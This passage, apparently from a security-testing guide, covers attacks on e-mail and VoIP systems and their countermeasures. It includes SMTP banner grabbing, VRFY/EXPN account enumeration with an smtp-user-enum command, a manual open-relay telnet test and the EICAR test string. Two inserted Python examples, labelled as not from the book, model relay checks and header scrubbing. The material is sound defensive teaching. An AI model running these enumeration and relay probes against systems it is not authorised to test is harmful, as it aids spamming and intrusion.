In addition to Linux kernel and general operating system updates, make sure you pay attention to Apache, OpenSSL, OpenSSH, MySQL, PHP, and other software on your systems. They may have weaknesses that you don't want to overlook.

Multi-platform update managers

Commercial tools have additional features, such as correlating patches with vulnerabilities and automatically deploying appropriate patches. Commercial tools that can help with Linux patch management include ManageEngine (www.manageengine.com/products/desktop-central/linux-management.html), GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard/specifications/patch-management-for-operating-systems), and Dell KACE Systems Management Appliance (http://software.dell.com/products/kace-k1000-systems-management-appliance/patch-management-security.aspx).

Part V

Hacking Applications

Read even more great Dummies content at www.dummies.com/extras/hacking.

In this part…

Well, this book has covered all the essential security tests from the nontechnical to the network and on to mobile devices and operating systems. What I haven't yet covered are the applications that run on top of all this as well as database servers and storage systems that ensure the data is available when we need it.

The first chapter in this part covers various messaging system hacks and countermeasures for e-mail and Voice over IP (VoIP) systems. Next, this part looks at web exploits, along with some countermeasures to secure websites and applications from the elements. Finally, this part covers attacks against database servers and storage systems. It covers both structured data found in various database systems and unstructured data, otherwise known as files scattered across the network waiting to be exploited.

Chapter 14

Communication and Messaging Systems

In This Chapter

Attacking e-mail systems

Assailing instant messaging

Assaulting Voice over IP applications

Communication systems such as e-mail and Voice over IP (VoIP) often create vulnerabilities that people overlook. Why? Well, from my experience, messaging software — both at the server and client level — is vulnerable because network administrators often believe that firewalls and antivirus software are all that's needed to keep trouble away, or they simply forget about securing these systems altogether.

In this chapter, I show you how to test for common e-mail and VoIP issues. I also outline key countermeasures to help prevent these hacks against your systems.

Introducing Messaging System Vulnerabilities

Practically all messaging applications are hacking targets on your network. Given the proliferation and business dependence on e-mail, just about anything is fair game. Ditto with VoIP. It's downright scary what people with ill intent can do with it.

With messaging systems, one underlying weakness is that many of the supporting protocols weren't designed with security in mind — especially those developed several decades ago when security wasn't nearly the issue it is today. The funny thing is that even modern-day messaging protocols — or at least the implementation of the protocols — are still susceptible to serious security problems. Furthermore, convenience and usability often outweigh the need for security.

Many attacks against messaging systems are just minor nuisances; others can inflict serious harm on your information and your organization's reputation. Malicious attacks against messaging systems include the following:

Transmitting malware
Crashing servers
Obtaining remote control of workstations
Capturing information while it travels across the network
Perusing e-mails stored on servers and workstations
Gathering messaging-trend information via log files or a network analyzer that can tip off the attacker about conversations between people and organizations (often called traffic analysis or social network analysis)
Capturing and replaying phone conversations
Gathering internal network configuration information, such as hostnames and IP addresses

These attacks can lead to such problems as unauthorized — and potentially illegal — disclosure of sensitive information, as well as loss of information altogether.

Recognizing and Countering E-Mail Attacks

The following attacks exploit the most common e-mail security vulnerabilities I've seen. The good news is that you can eliminate or minimize most of them to the point where your information is not at risk. Some of these attacks require the basic hacking methodologies: gathering public information, scanning and enumerating your systems, and finding and exploiting the vulnerabilities. Others can be carried out by sending e-mails or capturing network traffic.

E-mail bombs

E-mail bombs attack by creating denial of service (DoS) conditions against your e-mail software and even your network and Internet connection by taking up a large amount of bandwidth and, sometimes, requiring large amounts of storage space. E-mail bombs can crash a server and, when the crash is exploitable, even provide unauthorized administrator access — yes, even with today's seemingly endless storage capacities.

Attachments

An attacker can create an attachment-overload attack by sending hundreds or thousands of e-mails with very large attachments to one or more recipients on your network.

Attacks using e-mail attachments

Attachment attacks have a couple of goals:

The whole e-mail server might be targeted for a complete interruption of service with these failures:

Storage overload: Multiple large messages can quickly fill the total storage capacity of an e-mail server. If the messages aren't automatically deleted by the server or manually deleted by individual user accounts, the server will be unable to receive new messages.

This can create a serious DoS problem for your e-mail system, either crashing it or requiring you to take your system offline to clean up the junk that has accumulated. A 100MB file attachment sent ten times to 100 users can take 100GB of storage space. That can add up!

Bandwidth blocking: An attacker can crash your e-mail service or bring it to a crawl by filling the incoming Internet connection with junk. Even if your system automatically identifies and discards obvious attachment attacks, the bogus messages eat resources and delay processing of valid messages.

An attack on a single e-mail address can have serious consequences if the address is for an important user or group.

Countermeasures against e-mail attachment attacks

These countermeasures can help prevent attachment-overload attacks:

Limit the size of either e-mails or e-mail attachments. Check for this option in your e-mail server's configuration settings (such as those provided in Microsoft Exchange), your e-mail content filtering system, and even at the e-mail client level.

Limit each user's space on the server. This denies large attachments from being written to disk. Limit message sizes for inbound and even outbound messages should you want to prevent a user from launching this attack from inside your network. I find a few gigabytes is a good limit for a mailbox, but it all depends on your network size, storage availability, business culture, and so on, so think through this one carefully before putting anything in place.

Consider using SFTP or HTTP instead of e-mail for large file transfers. There are numerous cloud-based file transfer services available such as Dropbox and Box. You can also encourage your users to use departmental shares or public folders. By doing so, you can store one copy of the file on a server and have the recipient download the file on his or her own workstation.

Contrary to popular belief and use, the e-mail system should not be an information repository, but that's exactly what e-mail has evolved into. An e-mail server used for this purpose can create unnecessary legal and regulatory risks and can turn into a downright nightmare if your business receives an e-discovery request related to a lawsuit. An important part of your security program is to develop an information classification and retention program to help with records management. But don't go it alone. Get others such as your lawyer, HR manager, and CIO involved. This not only helps ensure the right people are on board but it can help ensure your business doesn't get into trouble for holding too many — or too few — electronic records in the event of a lawsuit or investigation.

Connections

A hacker can send a huge number of e-mails simultaneously to addresses in your e-mail system. Malware that's present on your network can do the same thing from inside your network if there's an open Simple Mail Transfer Protocol (SMTP) relay on your network (which is often the case). (More about that follows.) These connection attacks can cause the server to give up on servicing any inbound or outbound TCP requests. This situation can lead to a complete server lockup or a crash, and an exploitable crash can leave the attacker with administrator or root access to the system.

Attacks using floods of e-mails

An attack using a flood of e-mails is often carried out in spam attacks and other denial of service attempts.

Countermeasures against connection attacks

Prevent e-mail attacks as far out on your network perimeter as you can. The more traffic or malicious behavior you keep off your e-mail servers and clients, the better.

Many e-mail servers allow you to limit the number of resources used for inbound connections, as shown in the Maximum number of simultaneous threads setting for IceWarp e-mail server in Figure 14-1. This setting is called different things for different e-mail servers and e-mail firewalls, so check your documentation. Completely stopping an unlimited number of inbound requests can be impossible. However, you can minimize the impact of the attack. This setting limits the amount of server processor time, which can help during a DoS attack.

Figure 14-1: Limiting the number of resources that handle inbound messages.

Even in large companies, or if you're using a cloud-based e-mail service such as Office 365, there's likely no reason that thousands of inbound e-mail deliveries should be necessary within a short time period.

E-mail servers can be programmed to deliver e-mails to a service for automated functions, such as create this e-commerce order when a message from this account is received. If DoS protection isn't built into the system, an attacker can crash both the server and the application that receives these messages and potentially create e-commerce liabilities and losses. This can happen more easily on e-commerce websites when CAPTCHA (short for Completely Automated Public Turing test to tell Computers and Humans Apart) is not used on forms. I cover web application security in Chapter 15.

Automated e-mail security controls

You can implement the following countermeasures as an additional layer of security for your e-mail systems:

Tarpitting: Tarpitting slows down, and eventually shuns, sending hosts that misbehave, such as those that address a flood of messages to unknown users. If your e-mail server supports tarpitting, it can help prevent spam or DoS attacks against your server. If a predefined threshold is exceeded — say, more than 100 messages in one minute — the tarpitting function effectively shuns traffic from the sending IP address for a period of time.
E-mail firewalls: E-mail firewalls and content-filtering applications from vendors such as Symantec and Barracuda Networks can go a long way towards preventing various e-mail attacks. These tools protect practically every aspect of an e-mail system.
Perimeter protection: Although not e-mail-specific, many firewall and IPS systems can detect various e-mail attacks and shut off the attacker in real time. This can come in handy during an attack.
CAPTCHA: Using CAPTCHA on web-based e-mail forms can help minimize the impact of automated attacks and lessen your chances of e-mail flooding and denial of service — even when you're performing seemingly benign web vulnerability scans. These benefits really come in handy when testing your websites and applications, as I discuss in Chapter 15.

Banners

When hacking an e-mail server, a hacker’s first order of business is performing a basic banner grab to see whether he can discover what e-mail server software is running. This is one of the most critical tests to find out what the world knows about your SMTP, POP3, and IMAP servers.

Gathering information

Figure 14-2 shows the banner displayed on an e-mail server when a basic telnet connection is made on port 25 (SMTP). To do this, at a command prompt, simply enter telnet ip_or_hostname_of_your_server 25. This opens a telnet session on TCP port 25.

Figure 14-2: An SMTP banner showing server-version information.

The e-mail software type and server version are often very obvious and give hackers some ideas about possible attacks, especially if they search a vulnerability database for known vulnerabilities of that software version. Figure 14-3 shows the same e-mail server with its SMTP banner changed from the default (okay, the previous one was, too) to disguise such information as the e-mail server’s version number.

Figure 14-3: An SMTP banner that disguises the version information.

You can gather information on POP3 and IMAP e-mail services by telnetting to port 110 (POP3) or port 143 (IMAP).

If you change your default SMTP banner, don’t think that no one can figure out the version. General vulnerability scanners can often detect the version of your e-mail server. One Linux-based tool called smtpscan (www.freshports.org/security/smtpscan/) determines e-mail server version information based on how the server responds to malformed SMTP requests. Figure 14-4 shows the results from smtpscan against the same server shown in Figure 14-3. The smtpscan tool detected the product and version number of the e-mail server.

Figure 14-4: smtpscan gathers version info even when the SMTP banner is disguised.

Countermeasures against banner attacks

There isn’t a 100 percent secure way of disguising banner information. I suggest these banner security tips for your SMTP, POP3, and IMAP servers:

Change your default banners to conceal the information.

Make sure that you’re always running the latest software patches.

Harden your server as much as possible by using well-known best practices from such resources as the Center for Internet Security (www.cisecurity.org) and NIST (http://csrc.nist.gov).

SMTP attacks

Some attacks exploit weaknesses in SMTP. This e-mail communication protocol—which is over three decades old—was designed for functionality, not security.

Account enumeration

A clever way that attackers can verify whether e-mail accounts exist on a server is simply to telnet to the server on port 25 and run the VRFY command. The VRFY—short for verify—command makes a server check whether a specific user ID exists. Spammers often automate this method to perform a directory harvest attack (DHA), which is a way of gleaning valid e-mail addresses from a server or domain so hackers know whom to send spam, phishing, or malware-infected messages to.

Attacks using account enumeration

Figure 14-5 shows how easy it is to verify an e-mail address on a server with the VRFY command enabled. Scripting this attack can test thousands of e-mail address combinations.

Figure 14-5: Using VRFY to verify that an e-mail address exists.

The SMTP command EXPN—short for expand—might allow attackers to verify what mailing lists exist on a server. You can simply telnet to your e-mail server on port 25 and try EXPN on your system if you know of any mailing lists that might exist. Figure 14-6 shows how the result might look. Scripting this attack and testing thousands of mailing list combinations is simple.

Figure 14-6: Using EXPN to verify that a mailing list exists.

You might get bogus information from your server when performing these two tests. Some SMTP servers (such as Microsoft Exchange) don’t support the VRFY and EXPN commands, and some e-mail firewalls simply ignore them or return false information.

Another way to somewhat automate the process is to use the EmailVerify program in TamoSoft’s Essential NetTools (www.tamos.com/products/nettools). As shown in Figure 14-7, you simply enter an e-mail address, click Start, and EmailVerify connects to the server and pretends to send an e-mail.

Figure 14-7: Using EmailVerify to verify an e-mail address.

Yet another way to capture valid e-mail addresses is to use theHarvester (https://github.com/laramies/theHarvester) to glean addresses via Google and other search engines. As I outline in Chapter 9, you can download Kali Linux from www.kali.org to burn the ISO image to CD or boot the image directly through VMware or VirtualBox. In the Kali Linux GUI, simply choose Applications ⇒ Information Gathering ⇒ SMTP Analysis ⇒ smtp-user-enum and enter smtp-user-enum -M VRFY -u <username you wish to confirm> -t server IP/hostname, as shown in Figure 14-8.

Figure 14-8: Using smtp-user-enum for gleaning e-mail addresses.

You can customize smtp-user-enum queries as well using, for example, EXPN in place of VRFY and -U and a list of usernames in a file to query more than one user. Simply enter smtp-user-enum for all the search options.

Countermeasures against account enumeration

If you’re running Exchange, account enumeration won’t be an issue. If you’re not running Exchange, the best solution for preventing this type of e-mail account enumeration depends on whether you need to enable the VRFY and EXPN commands:

Disable VRFY and EXPN unless you need your remote systems to gather user and mailing list information from your server.

If you need VRFY and EXPN functionality, check your e-mail server or e-mail firewall documentation for the ability to limit these commands to specific hosts on your network or the Internet.

Finally, work with your marketing team and web developers to ensure that company e-mail addresses are not posted on your organization’s website or on social media websites. Also, educate your users about not doing this.

Relay

SMTP relay lets users send e-mails through external servers. Open e-mail relays aren’t the problem they used to be, but you still need to check for them. Spammers and criminal hackers can use an e-mail server to send spam or malware through e-mail under the guise of the unsuspecting open-relay owner.

Be sure to test for open relay from both outside and inside your network. If you test your internal systems, you might get false positives because outbound e-mail relaying might be configured and necessary for your internal e-mail clients to send messages to the outside world. However, if a client system is compromised, that issue could be just what the bad guys need to launch a spam or malware attack.

Automatic testing

Here are a couple of easy ways to test your server for SMTP relay:

Vulnerability scanners: Many vulnerability scanners such as Nexpose and QualysGuard will find open e-mail relay vulnerabilities.

Windows-based tools: One example is NetScanTools Pro (www.netscantools.com). You can run an SMTP Relay check on your e-mail server with NetScanTools Pro, as shown in Figure 14-9.

Although some SMTP servers accept inbound relay connections and make it look like relaying works, this isn’t always the case because the initial connection might be allowed, but the filtering actually takes place behind the scenes. Check whether the e-mail actually made it through by checking the account you sent the test relay message to.

Figure 14-9: Using NetScanTools Pro SMTP Server Tests to check for an open e-mail relay.

In NetScanTools Pro, you simply enter values for the SMTP mail server name and Your Sending Domain Name. Inside Test Message Settings, enter the Recipient Email Address and Sender’s Email Address. If the test is successful, NetScanTools Pro will open a window that says “Message Sent Successfully.”

You can also view the results in the main SMTP Server Tests window and generate a formal report by simply clicking View Results in a Web Browser and then clicking View Relay Test Results.

Manual testing

You can manually test your server for SMTP relay by telnetting to the e-mail server on port 25. Follow these steps:

1. Telnet to your server on port 25.

You can do this in two ways:

Use your favorite graphical telnet application, such as HyperTerminal (which comes with Windows) or SecureCRT (www.vandyke.com/products/securecrt/index.html).

Enter the following command at a Windows or Linux command prompt:

telnet mailserver_address 25

You should see the SMTP welcome banner when the connection is made.

2. Enter a command to tell the server, “Hi, I’m connecting from this domain.”

After each command in these steps, you should receive a different-numbered message, such as 999 OK. You can ignore these messages.

3. Enter a command to tell the server your e-mail address.

For example: mail from: [email protected]

[email protected].

4. Enter a command to tell the server who to send the e-mail to.

For example: rcpt to: [email protected]

Again, any e-mail address will suffice.

5. Enter a command to tell the server that the message body is to follow.

For example: data

6. Enter the following text as the body of the message: A relay test!

7. End the command with a period on a line by itself.

You can enter ? or help at the first telnet prompt to see a list of all the supported commands and, depending on the server, get help on the use of the commands.

The final period marks the end of the message. After you enter this final period, your message will be sent if relaying is allowed.

8. Check for relaying on your server:

Look for a message similar to Relay not allowed coming back from the server.

If you get a message similar to this, SMTP relaying is either not allowed on your server or is being filtered because many servers block messages that appear to originate from the outside yet come from the inside.

You might get this message after you enter the rcpt to: command.

If you don’t receive a message from your server, check your Inbox for the relayed e-mail.

If you receive the test e-mail you sent, SMTP relaying is enabled on your server and probably needs to be disabled. The last thing you want is to let spammers or other attackers make it look like you’re sending tons of spam, or worse, to be blacklisted by one or more of the blacklist providers. Ending up on a blacklist can disrupt e-mail sending and receiving—not good for business!

Countermeasures against SMTP relay attacks

You can implement the following countermeasures on your e-mail server to disable or at least control SMTP relaying:

Disable SMTP relay on your e-mail server. SMTP relay should be disabled by default. However, it pays to check. If you don’t know whether you need SMTP relay, you probably don’t. You can enable SMTP relay for specific hosts on the server or within your firewall configuration.

Enforce authentication if your e-mail server allows it. You might be able to require password authentication on an e-mail address that matches the e-mail server’s domain. Check your e-mail server and client documentation for details on setting up this type of authentication.
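The banner, VRFY and relay checks from the sections above, replayed against a constructed model of a mail server's policy decisions rather than a live system. This is an added Python example and not code from the book or from any mail server product: the SmtpPolicyServer class, its reply strings, the example.com, example.net and example.org names, the 10.0.0.5 and 203.0.113.9 client addresses and the alice and bob mailboxes are all assumptions made up for the demonstration. The weak configuration relays for anyone and answers VRFY; the hardened one accepts outside mail only for its own domains, lets only listed internal clients send outbound, and answers 252 to every VRFY, which is the behaviour the countermeasures above ask for.

```python
"""Added example (not from the book): an in-memory model of an SMTP server's relay and
VRFY policy, with the relay test from this section replayed against it. Nothing here
touches the network; reply codes follow RFC 5321 conventions and all names are made up."""
import re


class SmtpPolicyServer:
    """Constructed model of how a mail server answers HELO/MAIL/RCPT/DATA/VRFY."""

    def __init__(self, local_domains, my_networks=(), open_relay=False,
                 vrfy_enabled=False, banner="220 mail.example.com ESMTP"):
        self.local_domains = {d.lower() for d in local_domains}  # delivered locally
        self.my_networks = set(my_networks)  # client IPs allowed to send outbound via us
        self.open_relay = open_relay         # the misconfiguration the relay test looks for
        self.vrfy_enabled = vrfy_enabled     # the account-enumeration exposure
        self.banner = banner
        self.users = {"alice", "bob"}        # local mailboxes (constructed)
        self.delivered = []                  # (sender, recipients) the server queued
        self.client_ip = None
        self._reset()

    def _reset(self):
        self.sender, self.recipients, self.in_data = None, [], False

    def connect(self, client_ip):
        """Open a session from client_ip and return the greeting banner."""
        self.client_ip = client_ip
        self._reset()
        return self.banner

    def _may_accept_for(self, domain):
        # Accept mail for our own domains from anyone; mail for other domains only from
        # trusted clients (or from everyone, if the server is an open relay).
        return (domain in self.local_domains or self.open_relay
                or self.client_ip in self.my_networks)

    def command(self, line):
        """Return the server reply for one client line ('' for message-body lines)."""
        if self.in_data:
            if line != ".":
                return ""
            self.in_data = False
            self.delivered.append((self.sender, list(self.recipients)))
            return "250 2.0.0 Ok: queued"
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 mail.example.com"
        if verb == "VRFY":
            if not self.vrfy_enabled:   # countermeasure: never confirm or deny a mailbox
                return "252 2.0.0 Cannot VRFY user, but will accept message and attempt delivery"
            user = arg.strip().partition("@")[0].lower()
            return (f"250 2.1.5 <{user}@example.com>" if user in self.users
                    else "550 5.1.1 User unknown")
        if verb == "MAIL":
            self.sender = arg.partition(":")[2].strip().strip("<>")
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            addr = arg.partition(":")[2].strip().strip("<>")
            if not self._may_accept_for(addr.rpartition("@")[2].lower()):
                return "554 5.7.1 Relay access denied"
            self.recipients.append(addr)
            return "250 2.1.5 Ok"
        if verb == "DATA":
            if not self.recipients:
                return "503 5.5.1 Error: need RCPT command"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not implemented"


def relay_test(server, client_ip, sender, recipient):
    """Replay the manual relay test (HELO, MAIL FROM, RCPT TO, DATA, body, '.').

    'relayed' is True only when the final '.' is accepted, mirroring the advice to check
    that the message really went through rather than trusting the RCPT reply alone."""
    transcript = [("<connect>", server.connect(client_ip))]
    for cmd in ("HELO tester.example.net", f"MAIL FROM:<{sender}>",
                f"RCPT TO:<{recipient}>", "DATA"):
        reply = server.command(cmd)
        transcript.append((cmd, reply))
        if reply[:3] not in ("250", "354"):
            return {"relayed": False, "transcript": transcript}
    server.command("A relay test!")
    reply = server.command(".")
    transcript.append((".", reply))
    return {"relayed": reply.startswith("250"), "transcript": transcript}


def vrfy_discloses_users(server, client_ip):
    """True when VRFY answers differently for a real and a bogus mailbox."""
    server.connect(client_ip)
    return server.command("VRFY alice")[:3] != server.command("VRFY nosuchuser")[:3]


VERSION_RE = re.compile(r"\b\d+\.\d+(?:\.\d+)*\b")


def banner_discloses_version(banner):
    """True when the greeting carries something shaped like a product version number."""
    return VERSION_RE.search(banner) is not None


if __name__ == "__main__":
    weak = SmtpPolicyServer(["example.com"], open_relay=True, vrfy_enabled=True,
                            banner="220 mail.example.com ESMTP ExampleMail 1.2.3 ready")
    hardened = SmtpPolicyServer(["example.com"], my_networks={"10.0.0.5"})
    for name, srv in (("weak", weak), ("hardened", hardened)):
        result = relay_test(srv, "203.0.113.9", "tester@example.net", "someone@example.org")
        print(f"{name}: relayed={result['relayed']} "
              f"vrfy_enumerable={vrfy_discloses_users(srv, '203.0.113.9')} "
              f"banner_version={banner_discloses_version(srv.banner)}")
        for sent, got in result["transcript"]:
            print(f"  C: {sent}\n  S: {got}")
```

Running it prints both transcripts side by side. Two cases the text warns about show up in the model as well: from an internal client (10.0.0.5) the hardened server still relays outbound, which is the false positive you get when testing from inside, and a message addressed to a local mailbox is accepted from anywhere because that is delivery, not relay.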

E-mail header disclosures

If your e-mail client and server are configured with typical defaults, a malicious attacker might find critical pieces of information:

Internal IP address of your e-mail client machine (which can lead to the enumeration of your internal network and eventual exploitation via phishing and/or subsequent malware infection)

Software versions of your client and e-mail server along with their vulnerabilities

Hostnames that can divulge your network naming conventions

Testing

Figure 14-10 shows the header information revealed in a test e-mail I sent to my free web account. As you can see, it shows off quite a bit of information about my e-mail system:

The third Received line discloses my system’s hostname, IP address, server name, and e-mail client software version.

The X-Mailer line displays the Microsoft Outlook version I used to send this message.

Figure 14-10: Critical information revealed in e-mail headers.

Countermeasures against header disclosures

The best countermeasure to prevent information disclosures in e-mail headers is to configure your e-mail server or e-mail firewall to rewrite your headers, by either changing the information shown or removing it. Check your e-mail server or firewall documentation to see whether this is an option.

If header rewriting is not available (or even allowed by your ISP), you still might prevent the sending of some critical information, such as server software version numbers and internal IP addresses.
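An added Python example (not from the book) that does the two things this section asks for: it flags the disclosures in a message's headers and then rewrites the headers the way a gateway could. The message is constructed to resemble the kind of headers Figure 14-10 shows; it is not the book's message, and its hostnames, the 192.168.1.57 and 203.0.113.10 addresses, the "ExampleMail 1.2.3" server string and the list of client-identifying headers are all assumptions of this example.

```python
"""Added example (not from the book): find and strip e-mail header disclosures.
The message, hostnames, addresses and product strings below are all constructed."""
import re
from ipaddress import ip_address, ip_network

SAMPLE_MESSAGE = (
    "Received: from mail.example.com (mail.example.com [203.0.113.10])\n"
    "\tby mx.freemail.example (Postfix) with ESMTPS id ABC123\n"
    "\tfor <tester@freemail.example>; Fri, 01 Jan 2016 10:00:00 +0000\n"
    "Received: from WORKSTATION-42.corp.example.com ([192.168.1.57])\n"
    "\tby mail.example.com (ExampleMail 1.2.3) with ESMTP id XYZ789\n"
    "\tfor <tester@freemail.example>; Fri, 01 Jan 2016 09:59:58 +0000\n"
    "X-Mailer: Microsoft Outlook 15.0\n"
    "X-Originating-IP: [192.168.1.57]\n"
    "From: alice@example.com\n"
    "To: tester@freemail.example\n"
    "Subject: header test\n"
    "Message-ID: <constructed-id@mail.example.com>\n"
    "\n"
    "Body of the test message.\n"
)

RFC1918 = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# "<product> <major>.<minor>[.<patch>]", e.g. "Outlook 15.0" or "ExampleMail 1.2.3"
VERSION_RE = re.compile(r"\b([A-Za-z][\w-]*)[ /]v?(\d+\.\d+(?:\.\d+)*)\b")
CLIENT_HEADERS = {"x-mailer", "x-originating-ip", "user-agent"}  # assumed list; extend as needed


def parse_headers(raw):
    """Split raw message text into ([(name, value)], body); folded lines stay with their header."""
    head, _, body = raw.partition("\n\n")
    headers = []
    for line in head.splitlines():
        if line[:1] in (" ", "\t") and headers:     # continuation of the previous header
            name, value = headers[-1]
            headers[-1] = (name, value + "\n" + line)
        else:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return headers, body


def internal_ips(text):
    """IPv4 literals in text that fall inside the RFC 1918 private ranges."""
    found = []
    for literal in IPV4_RE.findall(text):
        try:
            addr = ip_address(literal)
        except ValueError:          # e.g. 999.1.1.1 matches the regex but is not an address
            continue
        if any(addr in net for net in RFC1918):
            found.append(literal)
    return found


def find_disclosures(raw):
    """List (header name, finding) pairs: internal addresses, version strings, client headers."""
    findings = []
    for name, value in parse_headers(raw)[0]:
        flat = " ".join(value.split())
        findings += [(name, f"internal address {ip}") for ip in internal_ips(flat)]
        findings += [(name, f"software version {p} {v}") for p, v in VERSION_RE.findall(flat)]
        if name.lower() in CLIENT_HEADERS:
            findings.append((name, "client-identifying header"))
    return findings


def scrub_headers(raw):
    """Rewrite the message the way an outbound gateway could: drop client-identifying headers
    and any Received hop that names an internal address; leave everything else untouched."""
    headers, body = parse_headers(raw)
    kept = []
    for name, value in headers:
        if name.lower() in CLIENT_HEADERS:
            continue
        if name.lower() == "received" and internal_ips(value):
            continue
        kept.append(f"{name}: {value}")
    return "\n".join(kept) + "\n\n" + body


if __name__ == "__main__":
    for header, finding in find_disclosures(SAMPLE_MESSAGE):
        print(f"{header}: {finding}")
    print("--- after rewriting ---")
    print(scrub_headers(SAMPLE_MESSAGE))
```

Dropping a Received hop removes forensic trail along with the disclosure, so a rewrite like this belongs on outbound mail at the gateway, not on the copies you archive internally; the scanning half can also be run against mail you receive from your own users to confirm the rewrite is actually in effect.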

Capturing traffic

E-mail traffic, including usernames and passwords, can be captured with a network analyzer or an e-mail packet sniffer and reconstructor.

Mailsnarf is an e-mail packet sniffer and reconstructor that’s part of the dsniff package (http://sectools.org/tool/dsniff). There’s a great commercial (yet low-cost) program called NetResident (www.tamos.com/products/netresident), too. You can also use Cain & Abel (www.oxid.it/cain.html) to highlight e-mail-in-transit weaknesses. I cover password cracking using this tool and others in Chapter 8.

If traffic is captured, a hacker or malicious insider can compromise one host and potentially have full access to another adjacent host, such as your e-mail server.

Malware

E-mail systems are regularly attacked by such malware as viruses and worms. One of the most important tests you can run for malware vulnerability is to verify that your antivirus software is actually working.

Before you begin testing your antivirus software, make sure that you have the latest virus software engine and signatures loaded.

EICAR offers a safe option for checking the effectiveness of your antivirus software. Although EICAR is by no means a comprehensive method of testing for malware vulnerabilities, it serves as a good, safe start.

EICAR is a European-based malware think tank that has worked in conjunction with anti-malware vendors to provide this basic system test. The EICAR test string transmits in the body of an e-mail or as a file attachment so that you can see how your server and workstations respond. You basically access (load) this file—which contains the following 68-character string—on your computer to see whether your antivirus or other malware software detects it:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

You can download a text file with this string from www.eicar.org/86-0-Intended-use.html. Several versions of the file are available on this site. I recommend testing with the Zip file to make sure that your antivirus software can detect malware within compressed files.

When you run this test, you may see results from your antivirus software similar to Figure 14-11.

Figure 14-11: Using the EICAR test string to test antivirus software.

In addition to testing your antivirus software, you can attack e-mail systems using other tools I cover in this book. Metasploit (www.metasploit.com) enables you to discover missing patches in Exchange and other servers that hackers could exploit. Brutus (www.hoobie.net/brutus) enables you to test the cracking of web and POP3/IMAP passwords.

General best practices for minimizing e-mail security risks

The following countermeasures help keep messages as secure as possible.

Software solutions

The right software can neutralize many threats:

Use anti-malware software on the e-mail server—better, the e-mail gateway—to prevent malware from reaching e-mail clients. Cloud-based e-mail systems such as those offered by Google and Microsoft often have such protection built in. Using malware protection on your clients is a given.

Apply the latest operating system and e-mail server security patches consistently and after any security alerts are released.

Encrypt (where it’s reasonable). You can use S/MIME or PGP to encrypt sensitive messages or use e-mail encryption at the desktop level or the server or e-mail gateway. Better yet (i.e. an easier means), you can also use TLS via the POP3S, IMAPS, and SMTPS protocols. The best option may be to use an e-mail security appliance or cloud service that supports the sending and receiving of encrypted e-mails via a web browser over HTTPS.

Don’t depend on your users to encrypt messages. As with any other security policy or control, relying on users to make security decisions often ends poorly. Use an enterprise solution to encrypt messages automatically instead.

Make sure that encrypted files and e-mails can be protected against malware.

Encryption doesn’t keep malware out of files or e-mails. You just have encrypted malware within the files or e-mails. Encryption keeps your server or gateway anti-malware from detecting the malware until it reaches the desktop.

Make it policy for users not to open unsolicited e-mails or any attachments, especially those from unknown senders, and create ongoing awareness sessions and other reminders. Plan for users who ignore or forget about the policy of not opening unsolicited e-mails and attachments. It will happen!

Operating guidelines

Some simple operating rules can keep your walls high and the attackers out of your e-mail systems:

Put your e-mail server behind a firewall on a different network segment from the Internet and from your internal LAN—ideally in a demilitarized zone (DMZ).

Harden by disabling unused protocols and services on your e-mail server.

Run your e-mail server and perform malware scanning on dedicated servers if possible (potentially even separating inbound and outbound messages). Doing so can keep malicious attacks out of other servers and information in the event the e-mail server is hacked.

Log all transactions with the server in case you need to investigate malicious use. Be sure to monitor these logs as well! If you cannot justify monitoring, consider outsourcing this function to a managed security services provider.

If your server doesn’t need certain e-mail services running (SMTP, POP3, and IMAP), disable them—immediately.

For web-based e-mail, such as Microsoft’s Outlook Web Access (OWA), properly test and secure your web server application and operating system by using the testing techniques and hardening resources I mention throughout this book.

Require strong passwords. Be it standalone accounts or domain-level Exchange or similar accounts, any password weaknesses on the network will trickle over to e-mail and surely be exploited by someone via Outlook Web Access or POP3. I cover password hacking in Chapter 8.

If you’re running sendmail—especially an older version—consider running a secure alternative, such as Postfix (www.postfix.org) or qmail (www.qmail.org).

Understanding Voice over IP

A widely-used technology in enterprises today is Voice over IP (VoIP). Whether it’s in-house VoIP systems or systems for remote users, VoIP servers, softphones, and other related components have their own set of security vulnerabilities. Like most things security-related, many people haven’t thought about the security issues surrounding voice conversations traversing their networks or the Internet—but it certainly needs to be on your radar. Don’t fret—it’s not too late to make things right. Just remember, though, that even if protective measures are in place, VoIP systems need to be included as part of your overall security testing strategy on a continuous basis.

VoIP vulnerabilities

As with any technology or set of network protocols, the bad guys are always going to figure out how to break in. VoIP is certainly no different. In fact, given what’s at stake (phone conversations and phone system availability), there’s certainly a lot to lose.

VoIP-related systems are no more (or less) secure than other common computer systems. Why? It’s simple. VoIP systems have their own operating system, they have IP addresses, and they’re accessible on the network. Compounding the issue is the fact that many VoIP systems house more intelligence—a fancy word for “more stuff that can go wrong”—which makes VoIP networks even more hackable.

If you want to find out more about how VoIP operates, which will undoubtedly help you root out vulnerabilities, check out VoIP For Dummies by Timothy V. Kelly.

On one hand, VoIP systems have vulnerabilities very similar to other systems I cover in this book, including

Default settings

Missing patches

Weak passwords

That’s why using the standard vulnerability scanning tools I cover is important. Figure 14-12 shows various vulnerabilities associated with the authentication mechanism in the web interface of a VoIP adapter.

Figure 14-12: A WebInspect scan of a VoIP network adapter showing several weaknesses.

Looking at these results, apparently this device is just a basic web server. That’s exactly my point—VoIP systems are nothing more than networked computer systems that have vulnerabilities that can be exploited.

On the other hand, two major security weaknesses are tied specifically to VoIP. The first is that of phone service disruption. Yep, VoIP is susceptible to denial of service just like any other system or application. VoIP is as vulnerable as the most timing-sensitive applications out there, given the low tolerance folks have for choppy and dropped phone conversations (cell phones aside, of course). The other big weakness with VoIP is that voice conversations are usually not encrypted and thus can be intercepted and recorded. Imagine the fun a bad guy could have recording conversations and blackmailing his victims. This is very easy on unsecured wireless networks, but as I show in the upcoming “Capturing and recording voice traffic” section, it’s also pretty simple to carry out on wired networks.

